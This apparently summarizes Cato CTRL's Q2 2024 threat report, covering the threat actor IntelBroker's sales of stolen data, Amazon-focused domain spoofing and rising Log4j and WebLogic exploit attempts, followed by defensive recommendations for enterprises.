Top 3 Insights from the Q2 2024 Cyber Threat Report

Cato CTRL (Cyber Threats Research Lab) recently unveiled its Q2 2024 SASE Threat Report, offering a comprehensive overview of cybersecurity risks based on data from over 1.38 trillion network flows across more than 2,500 global customers. The report, covering the period from April to June 2024, provides critical insights into emerging threats and security trends.

1. IntelBroker: A Persistent Threat in the Cyber Underground

Cato CTRL's deep investigation into hacking communities, particularly the dark web, has uncovered the activities of a notorious threat actor known as IntelBroker. A key figure within the BreachForums hacking community, IntelBroker has been actively involved in selling data and source code from high-profile organizations. These victims include companies such as AMD, Apple, Facebook, KrypC, Microsoft, Space-Eyes, T-Mobile, and even the US Army Aviation and Missile Command. IntelBroker’s operations highlight the significant risks posed by underground marketplaces where stolen corporate data is frequently traded.

2. Brand Spoofing: 66% Targets Amazon

One of the most alarming trends identified in the report is the rise of cybersquatting, where threat actors spoof domain names to profit from brand trademarks. Amazon has emerged as the most spoofed brand, accounting for a staggering 66% of all spoofed domains. Google follows, though at a much lower rate of 7%. This trend underscores the growing challenge companies face in safeguarding their digital identity and preventing phishing attacks that exploit these fake domains.

3. Log4j: Still a Major Threat

Even though it was discovered in 2021, the Log4j vulnerability continues to be a tool of choice for cybercriminals. Cato CTRL reports a 61% increase in attempted Log4j exploits in inbound traffic and a 79% rise in WANbound traffic between Q1 and Q2 2024. Additionally, there has been a sharp 114% surge in exploitation attempts targeting the Oracle WebLogic vulnerability (discovered in 2020) in WANbound traffic. These numbers reflect the persistence of older vulnerabilities and the need for organizations to prioritize timely patching.

Security Recommendations for Enterprises

To mitigate these ongoing threats, Cato CTRL offers several security recommendations:

• Monitor Dark Web: Continuously watch for mentions of your company’s data being traded on the dark web or hacking forums.
• Brand Protection: Implement tools to detect and prevent brand spoofing and cybersquatting attacks.
• Proactive Patching: Establish a regular patching schedule, focusing on critical vulnerabilities like Log4j.
• Incident Response Plans: Develop a detailed plan for responding to data breaches.
• "Assume Breach" Mindset: Adopt security approaches such as Zero Trust Network Access (ZTNA), Extended Detection and Response (XDR), and regular penetration testing.
• AI Governance: Ensure that AI tools and systems are governed effectively to prevent security risks.

The Q2 2024 report serves as a timely reminder for organizations to stay vigilant and proactive in their cybersecurity efforts, especially in addressing long-standing vulnerabilities and emerging threats like cybersquatting.